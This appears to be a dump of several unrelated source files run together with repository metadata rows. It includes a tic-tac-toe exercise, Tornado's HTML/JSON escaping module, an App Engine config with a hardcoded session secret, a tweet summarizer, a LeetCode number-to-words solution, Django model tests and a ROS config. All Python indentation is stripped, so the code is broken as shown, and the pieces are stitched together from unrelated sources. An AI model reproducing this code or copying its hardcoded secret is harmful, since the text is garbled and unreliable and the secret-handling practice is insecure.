#so you can get a 3 by 3 board representation.
#print('\n'*100)
def display_board(board):
print('\n'*100)
print(" | |")
print(" " + board[7] + ' | ' + board[8] + ' | ' + board[9])
print(" | |")
print("--------------------")
print(" | |")
print(" " + board[4] + ' | ' + board[5] + ' | ' + board[6])
print(" | |")
print("--------------------")
print(" | |")
print(" " + board[1] + ' | ' + board[2] + ' | ' + board[3])
print(" | |")
# TEST STEP1:RUN YOUR FUNCTION ON TEST VERSION OF THE BOARD LIST AND MAKE ADJUSTMENTS AS NECESSARY.
test_board=["#","X","O","X","O","X","O","X","O","X"]
#test_board=['']*10
display_board(test_board)
#print(display_board(test_board))
# STEP3:
def player_input():
"""
output:(player1=marker, player2=marker)
"""
marker=""
# keep asking player 1 to choose X or O
while marker!="X" and marker!="O":
marker=input("player:1 choose X or O: ").upper()
if marker=="X":
return("X","O")
else:
return("O","X")
# RUN THE FUNCTION TO MAKE SURE IT RUNS THE DESIRED OUTPUT
player1_marker,player2_marker=player_input()
# STEP3
def place_marker(board,marker,position):
board [position]=marker
test_board=["#","X","O","X","O","X","O","X","O","X"]
place_marker(test_board,"$",8)
display_board(test_board)
# STEP 4: WRITE IN A FUNCTION THAT TAKES IN A BOARD AND MARK (X OR O) AND CHECKS TO SEE IF THAT MARK HAS WON.
def win_check(board,mark):
return((board[7]==mark and board[8]==mark and board[9]==mark) or
(board[4]==mark and board[5]==mark and board[6]==mark)or
(board[1]==mark and board[2]==mark and board[3]==mark)or
(board[7]==mark and board[4]==mark and board[1]==mark)or
(board[8]==mark and board[5]==mark and board[2]==mark)or
(board[9]==mark and board[6]==mark and board[3]==mark)or
(board[7]==mark and board[5]==mark and board[3]==mark)or
(board[9]==mark and board[5]==mark and board[1]==mark))
win_check(test_board,"X")
| [
"64275709+parshuramsail@users.noreply.github.com"
] | 64275709+parshuramsail@users.noreply.github.com |
5bee45a0cbd221f62d0be3707a689e7652ead36e | 76df81aeec45e58b9e013314ca458b8f00eb9d78 | /lib/escape.py | 5b40d37d5113f0e4fb1b85ac5ef88b9db56e86c3 | [] | no_license | tuang/KindWave | 9bc180b45eb55b7b5055ba2fcf06fd3ecaf47622 | ffbf988685fc8577c969a3f9717e564ee13b845f | refs/heads/master | 2016-09-06T02:49:01.173437 | 2014-11-19T07:13:33 | 2014-11-19T07:13:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,413 | py | #!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Escaping/unescaping methods for HTML, JSON, URLs, and others."""
import htmlentitydefs
import re
import xml.sax.saxutils
import urllib
# json module is in the standard library as of python 2.6; fall back to
# simplejson if present for older versions.
try:
import json
assert hasattr(json, "loads") and hasattr(json, "dumps")
_json_decode = json.loads
_json_encode = json.dumps
except:
try:
import simplejson
_json_decode = lambda s: simplejson.loads(_unicode(s))
_json_encode = lambda v: simplejson.dumps(v)
except ImportError:
try:
# For Google AppEngine
from django.utils import simplejson
_json_decode = lambda s: simplejson.loads(_unicode(s))
_json_encode = lambda v: simplejson.dumps(v)
except ImportError:
def _json_decode(s):
raise NotImplementedError(
"A JSON parser is required, e.g., simplejson at "
"http://pypi.python.org/pypi/simplejson/")
_json_encode = _json_decode
def xhtml_escape(value):
"""Escapes a string so it is valid within XML or XHTML."""
return xml.sax.saxutils.escape(value, {'"': """})
def xhtml_unescape(value):
"""Un-escapes an XML-escaped string."""
return re.sub(r"&(#?)(\w+?);", _convert_entity, _unicode(value))
def json_encode(value):
"""JSON-encodes the given Python object."""
# JSON permits but does not require forward slashes to be escaped.
# This is useful when json data is emitted in a <script> tag
# in HTML, as it prevents </script> tags from prematurely terminating
# the javscript. Some json libraries do this escaping by default,
# although python's standard library does not, so we do it here.
# http://stackoverflow.com/questions/1580647/json-why-are-forward-slashes-escaped
return _json_encode(value).replace("</", "<\\/")
def json_decode(value):
"""Returns Python objects for the given JSON string."""
return _json_decode(value)
def squeeze(value):
"""Replace all sequences of whitespace chars with a single space."""
return re.sub(r"[\x00-\x20]+", " ", value).strip()
def url_escape(value):
"""Returns a valid URL-encoded version of the given value."""
return urllib.quote_plus(utf8(value))
def url_unescape(value):
"""Decodes the given value from a URL."""
return _unicode(urllib.unquote_plus(value))
def utf8(value):
if isinstance(value, unicode):
return value.encode("utf-8")
assert isinstance(value, str)
return value
# I originally used the regex from
# http://daringfireball.net/2010/07/improved_regex_for_matching_urls
# but it gets all exponential on certain patterns (such as too many trailing
# dots), causing the regex matcher to never return.
# This regex should avoid those problems.
_URL_RE = re.compile(ur"""\b((?:([\w-]+):(/{1,3})|www[.])(?:(?:(?:[^\s&()]|&|")*(?:[^!"#$%&'()*+,.:;<=>?@\[\]^`{|}~\s]))|(?:\((?:[^\s&()]|&|")*\)))+)""")
def linkify(text, shorten=False, extra_params="",
require_protocol=False, permitted_protocols=["http", "https"]):
"""Converts plain text into HTML with links.
For example: linkify("Hello http://tornadoweb.org!") would return
Hello <a href="http://tornadoweb.org">http://tornadoweb.org</a>!
Parameters:
shorten: Long urls will be shortened for display.
extra_params: Extra text to include in the link tag,
e.g. linkify(text, extra_params='rel="nofollow" class="external"')
require_protocol: Only linkify urls which include a protocol. If this is
False, urls such as www.facebook.com will also be linkified.
permitted_protocols: List (or set) of protocols which should be linkified,
e.g. linkify(text, permitted_protocols=["http", "ftp", "mailto"]).
It is very unsafe to include protocols such as "javascript".
"""
if extra_params:
extra_params = " " + extra_params.strip()
def make_link(m):
url = m.group(1)
proto = m.group(2)
if require_protocol and not proto:
return url # not protocol, no linkify
if proto and proto not in permitted_protocols:
return url # bad protocol, no linkify
href = m.group(1)
if not proto:
href = "http://" + href # no proto specified, use http
params = extra_params
# clip long urls. max_len is just an approximation
max_len = 30
if shorten and len(url) > max_len:
before_clip = url
if proto:
proto_len = len(proto) + 1 + len(m.group(3) or "") # +1 for :
else:
proto_len = 0
parts = url[proto_len:].split("/")
if len(parts) > 1:
# Grab the whole host part plus the first bit of the path
# The path is usually not that interesting once shortened
# (no more slug, etc), so it really just provides a little
# extra indication of shortening.
url = url[:proto_len] + parts[0] + "/" + \
parts[1][:8].split('?')[0].split('.')[0]
if len(url) > max_len * 1.5: # still too long
url = url[:max_len]
if url != before_clip:
amp = url.rfind('&')
# avoid splitting html char entities
if amp > max_len - 5:
url = url[:amp]
url += "..."
if len(url) >= len(before_clip):
url = before_clip
else:
# full url is visible on mouse-over (for those who don't
# have a status bar, such as Safari by default)
params += ' title="%s"' % href
return u'<a href="%s"%s>%s</a>' % (href, params, url)
# First HTML-escape so that our strings are all safe.
# The regex is modified to avoid character entites other than & so
# that we won't pick up ", etc.
text = _unicode(xhtml_escape(text))
return _URL_RE.sub(make_link, text)
def _unicode(value):
if isinstance(value, str):
return value.decode("utf-8")
assert isinstance(value, unicode)
return value
def _convert_entity(m):
if m.group(1) == "#":
try:
return unichr(int(m.group(2)))
except ValueError:
return "&#%s;" % m.group(2)
try:
return _HTML_UNICODE_MAP[m.group(2)]
except KeyError:
return "&%s;" % m.group(2)
def _build_unicode_map():
unicode_map = {}
for name, value in htmlentitydefs.name2codepoint.iteritems():
unicode_map[name] = unichr(value)
return unicode_map
_HTML_UNICODE_MAP = _build_unicode_map() | [
"leedeetiger@gmail.com"
] | leedeetiger@gmail.com |
9106a10aff28c894fe165cefa35ee82cd8488822 | b18f92a6a41a3d83e77848460d4a3f17e4fe677a | /introduction_to_python/recursive_functions/1_find_power/solution/test_solution.py | 1a873495b9e68f09bf6e6f09278da0ec62088424 | [] | no_license | ByteAcademyCo/Exercises | de71b885a498ead8296e6107836f9a06ac399d4f | 8332d0473ab35ee1d2975b384afda45c77ef943d | refs/heads/master | 2022-05-25T23:01:59.466480 | 2022-03-14T13:12:10 | 2022-03-14T13:12:10 | 252,842,407 | 1 | 109 | null | 2022-03-14T13:12:11 | 2020-04-03T21:09:47 | Python | UTF-8 | Python | false | false | 167 | py | def test_solution():
from solution import power
assert power(1, 3) == 1
assert power(2, 4) == 16
assert power(0, 1) == 0
assert power(5, 2) == 25
| [
"avelikevitch@gmail.com"
] | avelikevitch@gmail.com |
0d8da4c845c6dfa247dff447bd1179c0d97e47ca | c2d85a7ef18163e4ed6cc0ca8a524aef38ea7e2f | /mirror_api_server/utils.py | a4eb6c1ca95db5693299de1d98f6cc926eaba033 | [
"Apache-2.0"
] | permissive | rajeshvv/mirror-api | 3adc1dfc50ffc97bed0247d12b6042ec0159c28f | 6b6c66a3555fc8155e9fd4df4a3424aa534be2c6 | refs/heads/master | 2021-04-18T20:26:47.302278 | 2013-04-28T20:36:33 | 2013-04-28T20:36:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,193 | py | #!/usr/bin/python
# Copyright (C) 2013 Gerwin Sturm, FoldedSoft e.U.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Configuration options and helper functions for all services"""
__author__ = 'scarygami@gmail.com (Gerwin Sturm)'
import jinja2
import json
import os
import webapp2
from google.appengine.api.app_identity import get_application_id
from google.appengine.ext import ndb
from oauth2client.appengine import CredentialsNDBProperty
from webapp2_extras import sessions
from webapp2_extras.appengine import sessions_memcache
JINJA = jinja2.Environment(loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
appname = get_application_id()
base_url = "https://" + appname + ".appspot.com"
discovery_url = base_url + "/_ah/api"
discovery_service_url = discovery_url + "/discovery/v1/apis/{api}/{apiVersion}/rest"
with open("client_secrets.json", "r") as fh:
CLIENT_ID = json.load(fh)["web"]["client_id"]
# TODO: read session secret from file
SESSION_KEY = "sdjalasjdakjhskdauh3o8h4ofihskjdhfow38fhoaihoa2udjlakj"
config = {}
config["webapp2_extras.sessions"] = {"secret_key": SESSION_KEY}
# Add any additional scopes that you might need for your service to access other Google APIs
COMMON_SCOPES = ["https://www.googleapis.com/auth/plus.login"]
# userinfo.email scope is required to work with Google Cloud Endpoints
TEST_SCOPES = ["https://www.googleapis.com/auth/userinfo.email"]
# Remove the location scope from here if you don't need it
REAL_SCOPES = [
"https://www.googleapis.com/auth/glass.timeline",
"https://www.googleapis.com/auth/glass.location"
]
def createError(code, message):
"""Create a JSON string to be returned as error response to requests"""
return json.dumps({"error": {"code": code, "message": message}})
def createMessage(message):
"""Create a JSON string to be returned as response to requests"""
return json.dumps({"message": message})
class BaseHandler(webapp2.RequestHandler):
"""Base request handler to enable session storage for all handlers"""
def dispatch(self):
# Get a session store for this request.
self.session_store = sessions.get_store(request=self.request)
try:
# Dispatch the request.
webapp2.RequestHandler.dispatch(self)
finally:
# Save all sessions.
self.session_store.save_sessions(self.response)
@webapp2.cached_property
def session(self):
return self.session_store.get_session(name='mirror_session', factory=sessions_memcache.MemcacheSessionFactory)
class User(ndb.Model):
"""Datastore model to keep all relevant information about a user
Properties:
displayName Name of the user as returned by the Google+ API
imageUrl Avatar image of the user as returned by the Google+ API
verifyToken Random token generated for each user to check validity of incoming notifications
credentials OAuth2 Access and refresh token to be used for requests against the Mirror API
latitude Latest recorded latitude of the user
longitude Latest recorded longitude of the user
locationUpdate DateTime at which the location of the user was last update
friends List of Google+ friends id, as returned by the Google+ API
"""
displayName = ndb.StringProperty()
imageUrl = ndb.StringProperty()
verifyToken = ndb.StringProperty()
credentials = CredentialsNDBProperty()
latitude = ndb.FloatProperty()
longitude = ndb.FloatProperty()
locationUpdate = ndb.DateTimeProperty()
friends = ndb.StringProperty(repeated=True)
class TestUser(User):
_testUser = True
| [
"scarygami@gmail.com"
] | scarygami@gmail.com |
4e3318e59302534710541c49f0e6f88e96b9363b | b775aaa493c3250450be5e573ba02bd2a05b349f | /Text_Summary_thematicFrequency_themes | 06216c3263aed8360a3dcb6679f354c84f9643ba | [] | no_license | rddspatial/text-summarization | 050f2e366fa803fd39a957c72649093d46c775b0 | 50de17c5909958b312a549d55557e3cc5473c4bc | refs/heads/master | 2022-04-21T08:19:31.552362 | 2022-03-28T14:41:29 | 2022-03-28T14:41:29 | 255,176,418 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,787 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 13 12:59:41 2019
@author: Rahul
"""
from geotext import GeoText
from nltk import pos_tag
from nltk.tokenize import word_tokenize, sent_tokenize
from nltk.stem import WordNetLemmatizer
import re
import csv
import spacy # https://spacy.io/usage/spacy-101
import pandas as pd
from nltk.corpus import stopwords
import math
from heapq import nlargest
# Load English tokenizer, tagger, parser, NER and word vectors
nlp = spacy.load("en")
alphabets= "([A-Za-z])"
prefixes = "(Mt|Mr|St|Mrs|Ms|Dr)[.]"
suffixes = "(Inc|Ltd|Jr|Sr|Co)"
starters = "(Mr|Mrs|Ms|Dr|He\s|She\s|It\s|They\s|Their\s|Our\s|We\s|But\s|However\s|That\s|This\s|Wherever)"
acronyms = "([A-Z][.][A-Z][.](?:[A-Z][.])?)"
websites = "[.](com|net|org|io|gov)"
digits = "([0-9])"
def split_into_sentences(text):
text = " " + text + " "
text = text.replace("\n"," ")
text = re.sub(prefixes,"\\1<prd>",text)
text = re.sub(websites,"<prd>\\1",text)
if "Ph.D" in text: text = text.replace("Ph.D.","Ph<prd>D<prd>")
text = re.sub("\s" + alphabets + "[.] "," \\1<prd> ",text)
text = re.sub(acronyms+" "+starters,"\\1<stop> \\2",text)
text = re.sub(alphabets + "[.]" + alphabets + "[.]" + alphabets + "[.]","\\1<prd>\\2<prd>\\3<prd>",text)
text = re.sub(alphabets + "[.]" + alphabets + "[.]","\\1<prd>\\2<prd>",text)
text = re.sub(" "+suffixes+"[.] "+starters," \\1<stop> \\2",text)
text = re.sub(" "+suffixes+"[.]"," \\1<prd>",text)
text = re.sub(" " + alphabets + "[.]"," \\1<prd>",text)
text = re.sub(digits + "[.]" + digits,"\\1<prd>\\2",text)
if "”" in text: text = text.replace(".”","”.")
if "\"" in text: text = text.replace(".\"","\".")
if "!" in text: text = text.replace("!\"","\"!")
if "?" in text: text = text.replace("?\"","\"?")
text = text.replace(".",".<stop>")
text = text.replace("?","?<stop>")
text = text.replace("!","!<stop>")
text = text.replace("<prd>",".")
sentences = text.split("<stop>")
sentences = sentences[:-1]
sentences = [s.strip() for s in sentences]
return sentences
def getPlaces(string):
#string = 'Great! Daly City. Just felt an #earthquake in San Francisco. Did anyone else feel it? @USGS says 3.7 M..I am from WB. we are going to Mumbay! I live in Sonarpur, Kolkata. We are actually from IBM, used to work in sonarpur. The office is located at Mies-van-der-rohe, Munich.'
#p=GeoText(string).country_mentions
#print (p)
#item_list = list(p.items())
#print (item_list[0])
#place = GeoText(string)
#print (place.countries)
#print (place.cities)
#
#sentences=sent_tokenize(string)
#word_pos_list = []
#for sent in sentences:
# print (sent)
# word_pos=pos_tag(word_tokenize(sent))
## print (word_pos)
# word_pos_list.append(word_pos)
#print (word_pos_list)
#
#for entry in word_pos:
# print (entry[1])
spatial_preposition = ['at', 'in', 'near', 'to', 'on', 'towards', 'toward']
place_set = set()
final_place_set = set()
#string = string.lower()
# string = re.sub(r'[^\w\s\.]',' ',string)
# print(string)
for sent in split_into_sentences(string):
temp_place_set = set()
final_temp_place_set = set()
s=''
index = 0
# spacy NER implementation
spacy_nlp = spacy.load('en')
document = spacy_nlp(sent)
#print('Original Sentence: %s' % (sent))
for element in document.ents:
print('Type: %s, Value: %s' % (element.label_, element))
if (element.label_=='GPE') or (element.label_=='LOC'):
place_set.add(str(element).lower())
# GeoText implementation from geotext
place = GeoText(sent)
print (sent)
string = re.sub(r'[^\w\s\.\,\;\?\!]',' ',string)
sent = sent.replace('Mt.', 'Mt')
sent = sent.replace('mt.', 'mt')
sent = sent.replace('St.', 'St')
sent = sent.replace('st.', 'st')
for country in place.countries:
place_set.add(country.lower())
for city in place.cities:
place_set.add(city.lower())
# Rule-base implementation
word_pos = pos_tag(word_tokenize(sent))
for entry in word_pos:
# print (entry[0]+': index: ',index)
s=''
# if (entry[1]=='IN') or (entry[1]=='TO'):
if entry[0].lower() in spatial_preposition:
for i in range((index+1), len(word_pos)):
if (word_pos[i][1]=='NNP') or (word_pos[i][1]=='NN'):
s=s+word_pos[i][0]+' '
else:
if (len(s)>0):
temp_place_set.add(s.strip())
break
index = index + 1
# print (temp_place_set)
# scanning in the individual sentence
for entry in temp_place_set:
result = re.search(entry,sent)
if result:
final_temp_place_set.add(entry.lower())
else:
for i in word_tokenize(entry):
final_temp_place_set.add(i.lower())
# print ('final: ',final_temp_place_set)
# scanning in the entire text (multiple sentences)
# for entry in temp_place_set:
# result = re.search(entry,string)
# if result:
# final_place_set.add(entry.lower())
# else:
# for i in word_tokenize(entry):
# final_place_set.add(i.lower())
for place in final_temp_place_set:
place_set.add(place.lower())
# print ('place found: ', place_set)
return place_set
def getTimes(string):
doc=nlp(string)
timeset=set()
for entity in doc.ents:
if (entity.label_=='DATE'):
print(entity.text, entity.label_)
timeset.add(entity.text.lower())
return timeset
def getCasualty(string):
casualty_set=set()
lemmatizer = WordNetLemmatizer()
casulaty_src='/Users/Rahul/Documents/Research/Kiran/lexicon_wordnet_final/def_def_casualty or injury report.csv'
with open(casulaty_src) as f:
content = f.readlines()
# you may also want to remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]
for i in content:
i_lemma=lemmatizer.lemmatize(i.lower())
casualty_set.add(i_lemma)
return casualty_set
def getHelp(string):
casualty_set=set()
lemmatizer = WordNetLemmatizer()
t_src='/Users/Rahul/Documents/Research/Kiran/lexicon_wordnet_final/def_def_helpcalls.csv'
with open(t_src) as f:
content = f.readlines()
# you may also want to remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]
for i in content:
i_lemma=lemmatizer.lemmatize(i.lower())
casualty_set.add(i_lemma)
return casualty_set
def getIntensity(string):
casualty_set=set()
lemmatizer = WordNetLemmatizer()
t_src='/Users/Rahul/Documents/Research/Kiran/lexicon_wordnet_final/def_def_intensity.csv'
with open(t_src) as f:
content = f.readlines()
# you may also want to remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]
for i in content:
i_lemma=lemmatizer.lemmatize(i.lower())
casualty_set.add(i_lemma)
return casualty_set
def getReport(string):
casualty_set=set()
lemmatizer = WordNetLemmatizer()
t_src='/Users/Rahul/Documents/Research/Kiran/lexicon_wordnet_final/def_def_report the event.csv'
with open(t_src) as f:
content = f.readlines()
# you may also want to remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]
for i in content:
i_lemma=lemmatizer.lemmatize(i.lower())
casualty_set.add(i_lemma)
return casualty_set
src = '/Users/Rahul/Documents/Grices maxim/data/Tweet_convo manual data collection_1 to 200_Test_2.csv'
trgt='/Users/Rahul/Documents/Research/Kiran/summary/word_freq_place_theme_2_Test.csv'
df = pd.read_csv(src, sep=',', encoding='ISO-8859-1')
lemmatizer = WordNetLemmatizer()
row_list=list()
for i in range(2):
sentences=list()
test=''
sentences=list()
summary_list=list()
intensity_set_f=set()
help_set_f=set()
report_set_f=set()
casualty_set_f=set()
place_set_f=set()
time_set_f=set()
print (i)
if (i>0):
for conv_id, text in zip(df['Conv ID'], df['Content']):
# print ('c: ',conv_id)
if (conv_id==i):
# print ('text: ',text)
# text=text.lower()
text=text.replace('\x92',' ')
text=text.replace('\x93',' ')
text=text.replace('\x94',' ')
text=text.replace('\x85',' ')
sentences.append(text)
if sentences[-1] != '.':
sentences.append('.')
test = ' '.join(sentences)
stopwordlist = stopwords.words('english')
word_freq = {}
for sent in sent_tokenize(test):
sent=sent.lower()
place_set=getPlaces(sent)
time_set=getTimes(sent)
help_set=getHelp(sent)
intensity_set=getIntensity(sent)
report_set=getReport(sent)
casualty_set=getCasualty(sent)
sent = re.sub(r'[^\w\s]','',sent)
for word in word_tokenize(sent):
word=word.lower()
word_lemma=lemmatizer.lemmatize(word)
if word not in stopwordlist:
if word not in word_freq:
word_freq[word] = 1
else:
word_freq[word] += 1
if word.lower() in place_set and word.lower() in word_freq:
word_freq[word] += 10
place_set_f.add(word)
if word.lower() in place_set and word.lower() not in word_freq:
word_freq[word] = 10
place_set_f.add(word)
if word.lower() in time_set and word.lower() in word_freq:
word_freq[word] += 10
time_set_f.add(word)
if word.lower() in time_set and word.lower() not in word_freq:
word_freq[word] = 10
time_set_f.add(word)
if word_lemma.lower() in intensity_set and word_lemma.lower() in word_freq:
word_freq[word] += 5
intensity_set_f.add(word)
if word_lemma.lower() in intensity_set and word_lemma.lower() not in word_freq:
word_freq[word] = 5
intensity_set_f.add(word)
if word_lemma.lower() in help_set and word_lemma.lower() in word_freq:
word_freq[word] += 10
help_set_f.add(word)
if word_lemma.lower() in help_set and word_lemma.lower() not in word_freq:
word_freq[word] = 10
help_set_f.add(word)
if word_lemma.lower() in report_set and word_lemma.lower() in word_freq:
word_freq[word] += 5
report_set_f.add(word)
if word_lemma.lower() in report_set and word_lemma.lower() not in word_freq:
word_freq[word] = 5
report_set_f.add(word)
if word_lemma.lower() in casualty_set and word_lemma.lower() in word_freq:
word_freq[word] += 5
casualty_set_f.add(word)
if word_lemma.lower() in casualty_set and word_lemma.lower() not in word_freq:
word_freq[word] = 5
casualty_set_f.add(word)
print (word_freq)
print ('SPATIAL THEME SET: ',place_set_f)
print ('TEMPORAL THEME SET: ',time_set_f)
print ('INTENSITY THEME SET: ',intensity_set_f)
print ('HELP THEME SET: ',help_set_f)
print ('REPORT THEME SET: ',report_set_f)
print ('CASUALTY THEME SET: ',casualty_set_f)
num_sent=(sent_tokenize(test))
cutoff=0.3
threshold=int(math.ceil(len(num_sent)*cutoff))
print ('THRESHOLD: ',threshold, ', # of sentences: ',len(num_sent))
maximum_freq = max (word_freq.values())
max_word = max (word_freq, key = lambda key: word_freq[key])
#print ('maximum frequent word is: ',max_word,' with frequency count =', maximum_freq)
top_k = nlargest (2, word_freq, key = word_freq.get)
max_word = str(top_k[0])
max_word_value = word_freq[max_word]
print ('MAX_WORD: ', max_word, ': ', word_freq[max_word])
#print (word_freq[max_word])
for entry in word_freq:
# print (entry, ': ', word_freq[entry], ': ', max_word, ': ', max_word_value)
word_freq[entry] = (word_freq[entry]/max_word_value)
print (word_freq)
sent_freq = {}
for sent in sent_tokenize(test):
sent_score = 0
sent=sent.lower()
# print ('Queried sentence: ',sent)
for word in word_tokenize (sent):
# print ('word scanning: ',word)
if word in word_freq:
# print (word,': ',word_freq[word])
sent_score = sent_score + word_freq[word]
# print (sent_score)
sent_freq[sent] = sent_score
# print (sent,': ',sent_score)
print ('Input text: ', test)
for entry, value in sent_freq.items():
print (entry,': ',value)
top_k = nlargest (threshold, sent_freq, key = sent_freq.get)
print ('Summary: ')
for entry in top_k:
print (entry)
summary_list.append(entry)
summary=' '.join(summary_list)
row=[i,summary]
row_list.append(row)
header = ['Conv_ID','Summary']
with open(trgt, 'wt') as f:
csv_writer = csv.writer(f)
csv_writer.writerow(header)
for record in row_list:
print(record)
csv_writer.writerow(record)
| [
"noreply@github.com"
] | rddspatial.noreply@github.com | |
9f2e315804d79d7b9d92bfa94d7535cb25e69c56 | 11d9e08199ba6be0d86cec0b6ab56e50c8226fff | /case 2/ReadFile.py | 2bae2b489e923fee566ac8452929850632802d55 | [] | no_license | molianlaoda/542_Jiaqi_Chen | 07063689b5451cc8f761e8ed5a44e01b468194ac | e51d9d92dcba893a3d9c67962e23d5b784838cfe | refs/heads/master | 2021-01-15T21:07:27.084110 | 2015-11-27T23:08:56 | 2015-11-27T23:08:56 | 42,687,766 | 0 | 1 | null | 2015-10-27T18:58:35 | 2015-09-17T23:39:36 | Python | UTF-8 | Python | false | false | 752 | py | __author__ = 'jarfy'
class ReadFile(object):
def __init__(self):
# self.type = {}
self.record = []
self.content = []
self.col = {'Name': 0, 'Year': 1, 'Format': 2, 'Genre': 3, 'Director': 4, 'Writer': 5, 'Country': 6, 'Maker': 7}
def readFile(self, filename):
try:
fhand = open(filename)
except IOError:
print('Wrong Address')
for line in fhand:
word = line.split(',')
self.content.append(word)
def setattributes(self, *attr):
attr_list = [self.col[att] for att in attr]
for line in self.content:
self.record.append(''.join(line[i] for i in attr_list))
'''
test = ReadFile()
test.readFile('data.txt')
''' | [
"molianlaoda@163.com"
] | molianlaoda@163.com |
38c6c0a5f76bb46d4ebbf8c3daefec2159e2a13d | 1b80133706999ec3b21e06ffecd19e28fb2dfbbd | /posts/tests/test_models.py | 47346b3a499bf86c27a022c43e2067eeb9e23a89 | [] | no_license | Fastex007/hw04_tests | 3ab2819bd06395661d5e0c11e36d473d7a9dd519 | 6e9ebc8af6cb51ae62bf17e82359a686eb0d41f7 | refs/heads/master | 2023-02-13T18:14:22.934214 | 2021-01-13T15:45:41 | 2021-01-13T15:45:41 | 325,046,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,870 | py | from posts.lib.MyTestCase import MyTestCase
class PostModelTest(MyTestCase):
def test_verbose_name_post(self):
"""verbose_name в полях совпадает с ожидаемым.
Модель Post
"""
self.assertEqual(
PostModelTest.test_post._meta.get_field('text').verbose_name,
'Текст'
)
def test_verbose_name_group(self):
"""verbose_name в полях совпадает с ожидаемым.
Модель Group
"""
self.assertEqual(
PostModelTest.test_group._meta.get_field('title').verbose_name,
'Название'
)
def test_help_text_post(self):
"""help_text в полях совпадает с ожидаемым.
Модель Post
"""
self.assertEqual(
PostModelTest.test_post._meta.get_field('text').help_text,
'Текст публикации'
)
def test_help_text_group(self):
"""help_text в полях совпадает с ожидаемым.
Модель Group
"""
self.assertEqual(
PostModelTest.test_group._meta.get_field('title').help_text,
'Группа, в которой может быть опубликован текст'
)
def test_str_post(self):
"""Проверяем, правильно ли работает метод __str__ модели Post."""
self.assertEquals(PostModelTest.test_post.__str__(),
'Тестовый текст,')
def test_str_group(self):
"""Проверяем, правильно ли работает метод __str__ модели Group."""
self.assertEquals(PostModelTest.test_group.__str__(),
'Тестовая группа')
| [
"fastex007@yandex.ru"
] | fastex007@yandex.ru |
f30006767dcdf9f17324e03f92349b7c526fad62 | 07564c75c1f37f2e0304720d1c01f23a27ef3469 | /273.IntegertoEnglishWords/solution.py | cfa5b45a7acb04c003bd49fbf53a7a34351569ff | [] | no_license | ynXiang/LeetCode | 5e468db560be7f171d7cb24bcd489aa81471349c | 763372587b9ca3f8be4c843427e4760c3e472d6b | refs/heads/master | 2020-05-21T18:27:16.941981 | 2018-01-09T22:17:42 | 2018-01-09T22:17:42 | 84,642,017 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,439 | py | class Solution(object):
def numberToWords(self, num):
"""
:type num: int
:rtype: str
"""
res = self.helper(num)
return ' '.join(res) if res else 'Zero'
def helper(self, num):
Ones = ['One', 'Two', 'Three', 'Four', 'Five', 'Six', 'Seven', 'Eight', 'Nine', 'Ten', 'Eleven', 'Twelve', 'Thirteen', 'Fourteen', 'Fifteen', 'Sixteen', 'Seventeen', 'Eighteen', 'Nineteen']
Tens = ['Twenty', 'Thirty', 'Forty', 'Fifty', 'Sixty', 'Seventy', 'Eighty', 'Ninety']
Hundreds = ['Hundred', 'Thousand', 'Million', 'Billion']
res = []
if num == 0:
res = []
elif num < 20:
res.append(Ones[num - 1])
elif num < 10**2:
res.append(Tens[num // 10 - 2])
res += self.helper(num % 10)
elif num < 10**3:
res += self.helper(num // 10**2)
res.append(Hundreds[0])
res += self.helper(num % 10**2)
elif num < 10**6:
res += self.helper(num // 10**3)
res.append(Hundreds[1])
res += self.helper(num % 10**3)
elif num < 10**9:
res += self.helper(num // 10**6)
res.append(Hundreds[2])
res += self.helper(num % 10**6)
else:
res += self.helper(num // 10**9)
res.append(Hundreds[3])
res += self.helper(num % 10**9)
return res
| [
"yinan_xiang@163.com"
] | yinan_xiang@163.com |
31d4281eb036da10ee623ed155517ba10365ebef | cfdf3711761fce3dea56a647bb7ef554b08fee1a | /squirrel_2d_localizer/cfg/TwistCorrection.cfg | 9b1972490d03b8975de3de230713b2c09a388468 | [] | no_license | squirrel-project/squirrel_nav | 2d96163cc2bea3437dd2481355049c3d4a2ad31a | bf8ad9ff9f79ab489af82efe37d69716b088b73e | refs/heads/indigo_dev | 2021-03-22T05:18:30.620881 | 2018-04-03T08:13:06 | 2018-04-03T08:13:06 | 19,309,260 | 5 | 12 | null | 2018-04-03T08:13:08 | 2014-04-30T09:51:14 | C++ | UTF-8 | Python | false | false | 821 | cfg | #!/usr/bin/env python
from dynamic_reconfigure.parameter_generator_catkin import *
PACKAGE_NAME = "squirrel_2d_localizer"
gen = ParameterGenerator()
gen.add("enabled", bool_t, 0, "", True)
gen.add("corr_xx", double_t, 0, "", 0.0, 0.0, 100.0)
gen.add("corr_xy", double_t, 0, "", 0.0, 0.0, 100.0)
gen.add("corr_xa", double_t, 0, "", 0.0, 0.0, 100.0)
gen.add("corr_yy", double_t, 0, "", 0.0, 0.0, 100.0)
gen.add("corr_ya", double_t, 0, "", 0.0, 0.0, 100.0)
gen.add("corr_aa", double_t, 0, "", 1.0, 0.0, 100.0)
gen.add("corr_magnitude", double_t, 0, "", 0.001, 0.0, 100.0)
gen.add("alpha_filter", double_t, 0, "", 0.75, 0.0, 1.0)
